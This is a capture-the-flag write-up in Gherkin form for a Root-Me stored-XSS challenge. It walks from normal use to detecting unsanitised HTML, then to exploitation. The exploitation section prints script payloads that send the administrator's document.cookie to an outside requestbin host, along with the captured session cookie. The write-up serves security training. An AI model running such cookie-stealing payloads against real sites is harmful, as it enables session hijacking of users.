# Version 1.4.0
# language: en

  Feature:
    TOE:
      Rootme
    Category:
      Web - Client
    Challenge name:
      XSS Stored 1
    CWE:
      CWE-79: XSS
    Goals:
      Forge a malicious request and execute it with a logged user
    Recommendation:
      Sanitizing user input

    Background:
    Hacker's software:
    | <Name>           | <Version>       |
    | Firefox Quantum  | 62.0.2 (64-bit) |
    TOE information:
      Given I am accessing the site challenge01.root-me.org/web-client/ch18/
      And enter a site that allows me send messages with titles
      And the site is running on low security_level

    Scenario: Normal use case
    Enters the title and the message
      Given I access the site
      And I see two inputs, for title and message
      Given I write <title> in the title input
      And <message> in the message input
      | <title> | <message> |
      | test    | test      |
      | aaaa    | aaaa      |

      Then in the web I see
      """
      Posted messages:

      Welcome
      N'hésitez pas à me laisser un message / Feel free to leave a message
      """
      And the title and message sent
      """
      -------------------------
      <title>
      <message>
      -------------------------
      """

    Scenario: Static detection
    The code does not implement XSS protection like htmlentities o htmlpurifier
      When I test using an html tag (<h1 />) inside the message input
      Then I see how the effect of the html tag is reflected in the page
      Then in the title input html tags is not reflected
      Then due to any implementation causes all messages to be deleted
      """
      <div>
        <div>Posted messages:</div>
        <br/>
        <span>
          <b>Welcome</b>
        </span>
        <br/>
        <span>
          N'hésitez pas à me laisser un message / Feel free to leave a message
        </span>
        <br/>
        <hr/>
        <span>
          <b>Hi</b>
        </span>
        <br/>
        <span>
          <h1>Hello</h1>
        </span>
        <br/>
        <hr/>
      </div>
      """

      Then I can conclude that bulding a XSS vector script for page is possible

    Scenario: Exploitation
    Steal the administrator session cookie
      Given I already know I can build a XSS attack
      Then I proceed to build the following script:
      """
      <script>
        document.write("<img src='http//www.localhost.com/cookie.php?c="
        +document.cookie+"'></img>");
      </script>
      """
      Then I could use live http headers, burp suite or
      Then I could program a cookie capturer in php but
      Then I am using a web service called "requestbin.fullcontact.com"
      And when I send the malicious script:
      """
      <script>
        document.write("<img src='https://requestbin.fullcontact.com/1nchbwt1?
        inspect="+document.cookie+"'></img>");
      </script>
      """
      And I analyze in "requestbin" I see that in one of your headers I get
      Then the cookie of the administrator
      """
      http://requestbin.fullcontact.com
      GET /1nchbwt1?inspect=ADMIN_COOKIE=NkI9qe4cdLIO2P7MIsWS8ofD6

      FORM/POST PARAMETERS
      None
      QUERYSTRING

      inspect: ADMIN_COOKIE=NkI9qe4cdLIO2P7MIsWS8ofD6
      """

      Then I see that I have validated the cookie correctly
